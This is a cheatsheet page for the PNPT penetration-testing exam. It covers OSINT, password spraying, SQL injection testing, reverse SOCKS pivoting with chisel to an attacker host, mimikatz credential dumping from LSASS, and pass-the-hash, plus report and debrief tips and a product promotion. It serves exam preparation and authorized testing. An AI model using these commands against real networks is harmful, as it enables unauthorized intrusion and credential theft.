PNPT Cheatsheet 2026

The commands and workflow for the TCM Security Practical Network Penetration Tester exam — OSINT, external access, Active Directory, pivoting, the professional report and the 15-minute live debrief.

Last updated:

Quick Navigation

01 OSINT & External Recon 02 External Access 03 Active Directory 04 Pivoting & Tunneling 05 Post-Exploitation 06 Report & Debrief 07 Exam Tips

# OSINT & External Recon

The PNPT starts where a real engagement does: external reconnaissance. Enumerate employees, emails and exposed services to build your initial foothold.

💡 PNPT Tip: OSINT feeds initial access. A valid email format + an exposed portal often leads to a password-spray foothold.
theHarvester -d TARGET.com -b all
Harvest emails, subdomains and hosts from public sources
subfinder -d TARGET.com -silent | httpx -silent -title -tech-detect
Enumerate subdomains and fingerprint live external services
curl -s 'https://crt.sh/?q=%.TARGET.com&output=json' | jq -r '.[].name_value' | sort -u
Certificate transparency — reveal portals, VPN, webmail, staging
nmap -p- --min-rate=1000 -T4 TARGET -oN ext_ports.txt
Full external port scan of the in-scope hosts

# External Access

Turn OSINT into a foothold: password spraying against exposed portals, web exploitation, and credential reuse.

netexec smb TARGET -u users.txt -p 'Season2026!' --continue-on-success
Password spraying — one password across many users (avoid lockout)
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
Discover hidden web content on the external app
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
Test the external web app for SQL injection

# Pivoting & Tunneling

The PNPT goes external → internal. Pivot from your external foothold into the corporate LAN.

./proxy -selfcert # ligolo-ng on Kali, then add the tunnel route
Start the ligolo-ng proxy to reach the internal subnet
./chisel server -p 8080 --reverse # client: ./chisel client ATTACKER_IP:8080 R:socks
Reverse SOCKS5 proxy through the compromised host
proxychains4 netexec smb 10.10.0.0/24
Enumerate the internal network through the SOCKS proxy

# Post-Exploitation

Harvest credentials, dump secrets and demonstrate impact once you own hosts.

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Dump plaintext creds and hashes from LSASS memory
whoami /priv # look for SeImpersonate → GodPotato for SYSTEM
Check token privileges for local privilege escalation
netexec smb 10.10.0.0/24 -u ADMIN -H NTLM_HASH --shares
Spray the DA hash to map reachable hosts and shares

# Report & Debrief

The PNPT is not over at Domain Admin. You must deliver a professional report AND defend it in a 15-minute live debrief.

💡 PNPT Tip: The debrief tests understanding, not execution. For every step, be ready to explain WHY it worked and how you would remediate it.
# Executive Summary → Attack Narrative (path to DA) → AD Compromise Summary → Findings → Recommendations
The PNPT report skeleton — clear enough to present live
# Debrief prep: attack path diagram + 1 sentence "why" per step + remediation
Rehearse your 15-minute walkthrough with the assessor

# PNPT Exam Tips

Strategy for the 5-day exam, the report, and the live debrief.

🕵️ Start with OSINT: Your foothold usually comes from external recon — enumerate users and portals before anything else.
🗣️ Prepare the debrief early: Take clean notes and screenshots as you go so the 15-minute walkthrough is effortless.
🏰 Internal AD is the core: Practice Responder, ntlmrelayx, BloodHound and lateral movement until they are automatic.
📝 The report matters: Write a real client-style report — it is graded and it drives your debrief.
🔁 One free retake: The PNPT is designed to be accessible — don't panic, methodology beats speed.

❓ PNPT Frequently Asked Questions

The TCM Security PNPT is a 5-day hands-on exam against a realistic Active Directory network, followed by 2 days to write a professional report, and a mandatory 15-minute live debrief where you present your findings to a TCM assessor. You must compromise the domain and defend your methodology.

The debrief is a 15-minute live video call with a TCM assessor after you submit your report. You walk through your attack path and answer questions. It tests understanding, not just execution — you must explain WHY each step worked. A strong technical exam and report still need a solid debrief.

The PNPT is often seen as more beginner-friendly and realistic: strong external-to-internal and OSINT component, heavy Active Directory focus, no buffer overflow, and a live debrief. OSCP has standalone machines and a shorter 23h45 window. Both are respected; PNPT emphasizes a real engagement workflow.

theHarvester and OSINT tools, nmap, Responder and ntlmrelayx, BloodHound, impacket (GetUserSPNs, secretsdump, psexec), NetExec/CrackMapExec, evil-winrm, mimikatz, and ligolo-ng or chisel for pivoting. Report it like a real client engagement.

Yes — it is the core of the exam. After the external foothold you pivot internally and attack AD: LLMNR/NBT-NS poisoning (Responder), NTLM relay, Kerberoasting, pass-the-hash, token impersonation and lateral movement to Domain Admin.

Very important. Unlike most exams, the PNPT starts with an external OSINT phase — enumerating employees, emails and exposed services to build a foothold (for example a password spray against an exposed portal). OSINT feeds directly into initial access.

No. The PNPT does not include manual buffer overflow exploitation. It focuses on OSINT, external access, Active Directory, pivoting and reporting — a realistic internal network penetration test workflow.

Yes. The PNPT voucher includes one free retake, and TCM Security's model is designed to be accessible. Check the current TCM Security policy for exact retake and voucher details before scheduling.

A professional client-style report: executive summary, scope, attack narrative (path to Domain Admin), technical findings with severity and remediation, and strategic recommendations. It must be clear enough to present live during the 15-minute debrief.

Yes — as a preparation accelerator. The free mindmap organizes 12,020+ commands across PNPT domains (OSINT, AD, pivoting), the Pentest Space includes a dedicated PNPT report template with an AD Compromise Summary, and the AI Wizard generates a PNPT-style report. Always follow your exam rules.

📚 Related Resources

AI-Assisted PNPT Report

Turn your findings into a PNPT report with an AD Compromise Summary — the AI Wizard has a dedicated PNPT format ready for your debrief.

Try for free →

Prepare your PNPT with 12,020+ commands

This cheatsheet is the surface. Pentest Mindmap organizes 12,020+ commands in 34 categories with instant search, a PNPT report template and an AI report generator.

Start free →
📎 Found this cheatsheet useful?